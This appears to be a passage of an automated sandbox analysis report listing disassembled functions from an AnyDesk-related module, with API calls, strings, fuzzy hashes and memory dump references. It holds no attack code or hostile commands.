                                                                                                                                                                                                                                                  • Instruction ID: a21644a8bf8762770113d4e593ccbcbcfe62b5f98ff424adbd1c50a23299a0ca
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30698d9ed052925614070b01d3ad27930918cc672cca2bf69f2f7105bdf2c445
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94B15074E00669DBCB04CF68E5D07AEB7B5BF89348F948169D809E7380FB359942CB91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • OutputDebugStringA.KERNEL32(?), ref: 69C22481
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,00000000), ref: 69C224FF
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,00000000), ref: 69C225AF
                                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 69C225C6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DebugErrorFileIos_base_dtorLastOutputStringWritestd::ios_base::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3426912829-0
                                                                                                                                                                                                                                                  • Opcode ID: ce7fe796dddad8bd3d08f5b1f0f216fb2c4921091a64d85ec6a9a46b4438042f
                                                                                                                                                                                                                                                  • Instruction ID: 06934a46bd91d4729561a191e71c88f625d240b8d3588c2d6d591802e76392aa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce7fe796dddad8bd3d08f5b1f0f216fb2c4921091a64d85ec6a9a46b4438042f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA51E1B56043509FDB04CF54E855AAAB7F8FF89308F40482CF99697191E730E60ACBA3
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: fdf2d6fff5601896827650a7694e601a39b60bd8cd467cecd34269db04ce6001
                                                                                                                                                                                                                                                  • Instruction ID: e89ff6e74e40f4068ed9d8b6ff91b65af18bc6960847cfa2c33b86a70cd3cb54
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fdf2d6fff5601896827650a7694e601a39b60bd8cd467cecd34269db04ce6001
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28411735A003046BE7119FB9AC40BAE3BB9FF42774F108666F41BD61D0FBB44871466A
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 74c7efa4801600ec62c7b9ad5e2bd70ad8509637d70d66a1bb955e6c0bbbc94a
                                                                                                                                                                                                                                                  • Instruction ID: 9335006f843a207a5aed62547944f965cb7bb43f0f575ccbd7b04aa4f02fb1b7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74c7efa4801600ec62c7b9ad5e2bd70ad8509637d70d66a1bb955e6c0bbbc94a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28411376B00708BFE324CF78EC40B5ABBE9EB89B64F10863AE151DB681F77195119790
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,08A8C445,00000008,00000000,00000000,69C300E9,00000000,-00000018,?,00000001,00000008,08A8C445,00000001,69C300E9,00000001), ref: 69C54C35
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 69C54CBE
                                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 69C54CD0
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C54CD9
                                                                                                                                                                                                                                                    • Part of subcall function 69C4C844: HeapAlloc.KERNEL32(00000000,0000010C,00000004,?,69C4C8A7,?,00000000,?,69C57B70,0000010C,00000004,?,0000010C,?,?,69C4DB9D), ref: 69C4C876
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 573072132-0
                                                                                                                                                                                                                                                  • Opcode ID: 8c7c9a92dea4f98afc31cb89b5c70b8ae295157fce55a7cbb2720c98c999ef30
                                                                                                                                                                                                                                                  • Instruction ID: 78b923635726d52e0b6bb8dcb526e2b19964815ee4be9de98dfd83c78e009af7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c7c9a92dea4f98afc31cb89b5c70b8ae295157fce55a7cbb2720c98c999ef30
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4331CF72A0021AABDF15CF65EC40EAE3BA9EF81714F014128EC15DB250F735E971CBA4
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,?,?,69C60690), ref: 69C32F5B
                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,69C60690), ref: 69C32F6F
                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,00000001,00000001,?,?,?,?,?,?,?,69C60690), ref: 69C32F83
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 69C32FBD
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Time$System$File$LocalSpecificUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1393065386-0
                                                                                                                                                                                                                                                  • Opcode ID: 516e1b022e57b2c444f98cd44ecc32a75937b2f48d9673c4e3dd4ea6dd8d9dcc
                                                                                                                                                                                                                                                  • Instruction ID: 7dd155237277ef37ea3d9bccccf77ee5c64bdc10337797513625e491baf62fd0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 516e1b022e57b2c444f98cd44ecc32a75937b2f48d9673c4e3dd4ea6dd8d9dcc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6314A751183659BC710CF65D400B7BB7E8BF88B14F10880EF899C7290E739D94ADBA6
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 86530d78637159e232dc846ea9475dbf459d6c7b00d223846420aa2c824e9fc9
                                                                                                                                                                                                                                                  • Instruction ID: a35c9ddf0d12fa442cc79dbb90cee842365eb2d54a8cc09a5ba5c24e4e6f55c8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86530d78637159e232dc846ea9475dbf459d6c7b00d223846420aa2c824e9fc9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A018BB27096167FFB0029797CC0F6B226CEB92BB8B205736B520611D4FB61AC5181A2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000), ref: 69C41409
                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 69C41418
                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 69C41421
                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 69C4142E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                  • Opcode ID: b8e42e237f0e12a529c3931c806558521ad95c1069547b0fd9bb83b603859704
                                                                                                                                                                                                                                                  • Instruction ID: d68a8e4210aeb487b3d634b3b8b01ee2318b8fe7afb09a36b938e2633aa62926
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8e42e237f0e12a529c3931c806558521ad95c1069547b0fd9bb83b603859704
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E119171E04118DFDF04CFB9D5446AE7BB4FF5A311F91146AE806DB240EA308601CBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,69C4EE62,00000000,00000000,00000000,00000000,?,69C4F12C,00000006,FlsSetValue), ref: 69C4EEED
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,69C4EE62,00000000,00000000,00000000,00000000,?,69C4F12C,00000006,FlsSetValue,69C6F920,69C6F928,00000000,00000364,?,69C4FCEC), ref: 69C4EEF9
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,69C4EE62,00000000,00000000,00000000,00000000,?,69C4F12C,00000006,FlsSetValue,69C6F920,69C6F928,00000000), ref: 69C4EF07
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3177248105-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• ReadFile.KERNEL32(00000028,00000000,0000001C,0000001C,00000000,0000001C,00000000,00000000,?,?,69C660D0,0000001C,00000000,00000028), ref: 69C66D8A
• GetLastError.KERNEL32(?,?,69C660D0,0000001C,00000000,00000028), ref: 69C66D94
• GetLastError.KERNEL32(?,?,69C660D0,0000001C,00000000,00000028), ref: 69C66D9F
• GetFileType.KERNEL32(00000028,?,?,69C660D0,0000001C,00000000,00000028), ref: 69C66DBB
Memory Dump Source
• Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
• Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
Similarity
• API ID: ErrorFileLast$ReadType
• String ID:
• API String ID: 2855922492-0
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,00000000), ref: 69C66761
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 69C6677A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 69C66787
                                                                                                                                                                                                                                                  • CloseHandle, xrefs: 69C6679A
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                  • String ID: CloseHandle$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc
                                                                                                                                                                                                                                                  • API String ID: 918212764-2138661059
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4DDC4: _free.LIBCMT ref: 69C4DDF9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4DD7A
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: HeapFree.KERNEL32(00000000,00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000), ref: 69C4CBBB
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: GetLastError.KERNEL32(00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000,00000000), ref: 69C4CBCD
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4DD8D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4DD9E
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4DDAF
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C24BF6
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C24C00
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 69C4CA2D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                  • String ID: pow
                                                                                                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                  • Opcode ID: 60f45b6ea58c3d3026d90c6a6628b4778510476999a72b6e2036af90fd235882
                                                                                                                                                                                                                                                  • Instruction ID: 1d38beb01d984b808b88d7f801583717dbfdb5f691d994f6b1524e7bc8623698
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60f45b6ea58c3d3026d90c6a6628b4778510476999a72b6e2036af90fd235882
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42517C71B8990196DF01E614EB1139A3BB4BB41F94F10CD68E4A2461F8FF3585B9878B
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 0-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: aa861dc8e45c3631e9095f10004bf9936ed46ed37cd82a8e95221da4121e518c
                                                                                                                                                                                                                                                  • Instruction ID: 634955b5fa9fcc41e23684155698ae7a9d31674e4b0d51fb4e74d918f8cfb939
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa861dc8e45c3631e9095f10004bf9936ed46ed37cd82a8e95221da4121e518c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB41F7323006544FE3309E5CF940A4AF7E9FBA5661F204A3FE591CB691E7B1D84487B1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
